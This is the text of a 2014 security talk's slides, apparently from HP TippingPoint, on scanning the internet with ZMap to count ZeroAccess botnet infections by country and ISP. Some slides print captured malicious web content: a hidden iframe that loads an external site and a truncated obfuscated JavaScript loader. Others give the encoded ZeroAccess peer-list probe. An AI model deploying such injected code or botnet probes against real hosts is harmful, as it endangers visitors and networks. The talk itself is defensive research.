The document discusses internet scanning for botnets, highlighting tools like ZMap and Project Sonar, which are used for identifying compromised hosts and malicious activities online. It outlines a method for scanning botnets, notably the Zero Access botnet, detailing its operational mechanics and offering infection statistics across various countries and ISPs. The author concludes with suggestions for future research, including tracking infection rates and the potential for improving detection methods.

1. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
Hunting Botnets with
ZMap
Ricky Lawshae / 21 March 2014

2. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.2
Who am I?
• Security Researcher at HP TippingPoint DVLabs
• At Rapid7 before that, and BreakingPoint before that…been doing this for a
while now
• Specialize in network protocol analysis
• Breaker of things/voider of warranties

3. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
What is the internet?

4. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.4
The State of Scanning
• Internet Census 2012
– Researcher compromised more than 400k devices
– Created the Carna Botnet
– Started sending various probes to every machine on the internet
– Published the scan data
• Critical.io
– Same idea of scanning the whole internet
– Instead of having a 400k botnet, it was just HD Moore doing it himself
– Data was not public at the time

5. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.5
The State of Scanning
• Do-it-yourself
– Growing number of internet-scale scanning tools (ZMap, Masscan, etc)
– Arms race of sorts to see who can scan /0 the fastest
• “Scan the entire internet in X minutes!”
• ZMap
– Created by a team at University of Michigan
– Open-source (https://github.com/zmap/zmap)
– Easy to use
• zmap -M udp -p [port] -B 400M --probe-args=file:[payload_file]

6. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.6
The State of Scanning
• Project Sonar
– Started by Rapid7 in 2013
– Community-driven scan data collection
– Utilizes many different scan methods
– Publicly available (https://scans.io/)

7. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.7
The State of Scanning
• Get a better idea of what the internet is
• Take a proactive approach to difficult problems
– Such as…

8. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.8
Malware
• Largely unquantified problem
– At least, not efficiently or accurately
– Assume it’s bad, we just don’t know exactly how bad
• The current approach
– Passive monitoring of “sensors”
– Hits on IDS devices, etc
– Extrapolate infection numbers from sample sets
• A new approach
– Use internet scanning (ie ZMap) to look for compromised/malicious hosts
– They tell you right then if they’re infected or not

9. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.9
Using the Data We Have
• Searching through existing scan data shows a lot of awful out there
– Exploit kit landing pages
– Malicious javascript
– Shells!

10. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.10
Using the Data We Have
[110.137.80.152]
HTTP/1.1 200 OK
Date: Fri, 14 Dec 2012 09:07:26 GMT
Server: Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.8 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Accept-Ranges: bytes
Content-Length: 312
Connection: close
Content-Type: text/html
<html>
<head>
<meta name="author" content="Kai Oswald Seidler">
<meta http-equiv="refresh" content="0;url=/xampp/">
</head>
<body bgcolor=#ffffff><!--5b1825--><iframe frameborder=0 height=1 width=1 scrolling=no src='http://gabranits.com/main.php?page=85deef298b2e1e90'> </iframe><!--/5b1825-
->
</body>
</html>

11. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.11
Using the Data We Have
[108.60.3.182]
HTTP/1.1 200 OK
Date: Sat, 15 Dec 2012 20:20:49 GMT
Server: Apache
Last-Modified: Sat, 15 Dec 2012 07:43:52 GMT
Accept-Ranges: bytes
Content-Length: 2685
Connection: close
Content-Type: text/html
<html><body bgcolor="#000000"><!--393740--><script type="text/javascript" language="javascript" >
try{bgewg346tr++}catch(aszx){try{dsgdsg-
142}catch(dsfsd){try{window.document.body++}catch(gdsgsdg){dbshre=82;}}}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;
}if(!asd){e=eval;}asgq=new
Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,98,112,97,106,102,27,52,24,93,105,94,108,101,94,104,111,37,91,107,95,92,107,93,
62,102,96,100,93,103,110,35,30,97,95,108,92,100,93,32,35,54,4,2,25,26,27,23,95,114,99,108,99,38,108,108,94,23,53,25,33,99,107,108,105,52,42,38,111,94,91,109,90,96,9
8,110,96,90,108,108,40,105,99,39,98,103,92,94,93,108,41,94,99,97,100,40,107,95,104,32,53,8,1,24,25,26,27,94,113,98,107,103,37,107,109,115,103,92,38,105,105,110,96,
108,98,105,105,23,53,25,33,92,89,10

12. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.12
Using the Data We Have
[83.141.18.221]
(root@web21:/)n/bin/sh: line 1: GET: command not foundn/bin/sh: line 2: r: command not foundn

13. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.13
Using the Data We Have
• Good to know, but we want to go deeper
• Sending generic requests won’t work for everything
– UDP services only respond to requests they recognize
– Targeted malware scanning would get better results faster
• Time to do our own scan!

14. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.14
Scanning for Botnets
• A step-by-step guide
– Write a ZMap probe that elicits a response from infected hosts and/or C&C servers
– Find some bandwidth
• Dedicated servers with fat, unmetered pipes work nicely
• My current setup has a 500Mbps unlimited line and a TB of storage
– Send your probe to the entire internet
– Examine the responses
• Remove any false positives you got back
• You can automate most of this if you know what you’re looking for
– Respond to abuse complaints

15. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.15
Scanning for Botnets
• What makes a good target
– UDP is easier than TCP
• Less overhead
• Less risk of false positive (well…we’ll get to that)
– Small range of listening ports
• Zeus picks randomly from a 10000 port range…It adds up quick
• What doesn’t make a good target
– Malware that communicates over HTTP
• Lots of results == lots of post-processing
• ZMap doesn’t handle this well

16. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
Proof of Concept

17. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.17
Proof of Concept: Zero Access
• Botnet used mostly for click-fraud, some bitcoin mining
• Been in the news a lot lately
– Microsoft take-down attempt on Dec 5th
– And Symantec last Sept
• P2P botnet where all infected hosts can talk to each other
– “Super peers” are internet-facing machines
– Hard to track down actual C&C servers, since control is decentralized
– Hard to completely shut down

18. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.18
Proof of Concept: Zero Access
• It makes a good proof of concept for many reasons
– Bot communication over both TCP and UDP
– Small command payloads
• 16 bytes for the one I used
– Small range of hardcoded ports
• 16461, 16464, 16465, 16470, 16471
– Known to be currently active
• Bound to get at least some results

19. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.19
Proof of Concept: Zero Access
• GetL command
– Get list of peers that an infected host is able to communicate with
– 16 byte payload
• 4 byte CRC checksum
• 4 byte command string (“getL”)
• 4 byte unknown (Sequence number or packet ID? Anyways, it’s 0)
• 4 byte unique ID
– Gets “encrypted” using a ROL/XOR algorithm
• 4 byte key ^ 1st 4 bytes of data
• Rotate key bits left one place, and XOR rotated key with next 4 data bytes
• Repeat
– Hardcoded key == “ftp2”

20. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.20
Proof of Concept: Zero Access
xE7x98xEDx03x28x94x8DxAB
xC9xC0xD1x99x13xC3xC6xF9

21. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
Sweet, sweet data

22. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.22
Infection by the Numbers
• Scan date: 4 December 2013
• Scan duration: 15 hours
• Total unique hosts found: 10500
• Infected hosts (by port)
– 16461: 239
– 16464: 3503
– 16465: 1285
– 16470: 2192
– 16471: 4230
• Scan date: 24 January 2014
• Scan duration: 15 hours
• Total unique hosts found: 7873
• Infected hosts (by port)
– 16461: 176
– 16464: 3732
– 16465: 1238
– 16470: 1798
– 16471: 2713

23. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.23
Second Scan by Country
• Infection found across 109 countries
• US accounts for 34% of infected hosts
– Seems like a lot until you realize that US
owns 34% of all IPv4 addresses[1]
• Japan is distant 2nd at 9%
• Switzerland has 5 (~0.065%)
• Venezuela seems a little high…
[1] http://www.ip2location.com/reports/internet-ip-address-2012-report

24. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
A quick aside to discuss a
couple of anomalies

25. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.25
Where is China?
• 56th place in the list of infected countries
– 11 infected hosts
– 0.1% of total
• Consensus is that this is probably Great Firewall of China related
• If we count Hong Kong as part of China, the number goes up quite a bit
– Hong Kong had 54 infected (about 5 times more than all of China)
– Bumps China up to almost 1%!

26. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.26
The Curious Case of Israel
• Before removing false positives, Israel showed WAY higher than expected infected hosts
– 3372 “infected” in first scan (23% of total). Was it being targeted?
– Only 80 of those were legitimate results
• Examining the false positives among the Israeli IP addresses showed most were HTTP responses
• Turns out http://internet-rimon.com/ (major Israeli ISP) does some intense nanny filtering
HTTP/1.0 200 OK
Connection: keep-alive
Rimon: RWC_BLOCK
Content-type: text/html
Refresh: 15
Date: Wed, 04 Dec 2013 06:31:28 GMT
Expire: Mon, 02 Dec 2013 21:11:28
Pragma: no-cache
Cache-Control: no-cache
Server: lighttpd/1.4.19
Content-Length: 103
<html><head></head><body><center><b>You are not recognized in the system
!!!</b></center></body></html>

27. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
Back to the Data

28. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.28
Trouble in South America?
Everywhere else is getting better, but S. America seems to be getting much worse (CL +21, AR +61, VE
+80, etc). Politics? Impending World Cup? Impossible to guess. May even be coincidence.

29. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.29
Second Scan by ISP
• No big surprises here
– Most ISP’s in top 10 are based in countries in
top 10
– Though the order is somewhat interesting
• Should be noted that Microsoft still has 16
infected hosts out there…
– Funny in light of the fact that they were going
so hard against Zero Access recently
• Couple from Amazon, godaddy, etc
725
470
254
228
205
196
172
140
130
91
T OP 10 INF E C T E D IS P S
Comcast Cable Time Warner Charter Comm RCS & RDS
Chunghwa CanTV Cox Comm Optimum Online
Open Comp Net Telecom Italia

30. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
The Takeaway

31. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.31
What We Learned
• It works!
– Well…for specific types of malware
– Stronger and weaker than old approach in certain aspects
– Only get part of the picture
– Feasibility of HTTP-based C&C hunting has yet to be determined
• Zero Access is still rampant
– Dumb guess at number of peers based only on super-peers means as much as 2 million infected
– Reality is probably lower, could decode responses to find out…
• China and Israel both have pretty good firewalls apparently

32. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.32
Where do we go next?
• Decode responses I got from this scan to pull out peer lists
– Get a more complete picture of the infection
– Though just knowing all the super-peers is still very useful
• Going after C&C
– Currently assessing potential targets
– Would like to avoid having to process HTTP responses
• Get a regularly scheduled cycle of scans going
– More probes!
– Could have monthly or even weekly updates on multiple botnets

33. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.33
What else could you do with this?
• Track infection rates over time
– More data points == better conclusions
– See if it’s getting better or worse
– Watch the distribution to other countries
• Watch take-down attempts as they happen
– Measure effectiveness
• Scan your own internal networks
– Can scan an entire class A in minutes
– You should already be scanning your own networks anyway

34. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.34
References
https://zmap.io/ [ZMap open-source scanner project]
http://en.wikipedia.org/wiki/ZeroAccess_botnet [Zero Access entry on Wikipedia]
https://twitter.com/HeadlessZeke [I rarely say anything valuable, but I am responsive]
headlesszeke@hp.com

35. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.
Thank you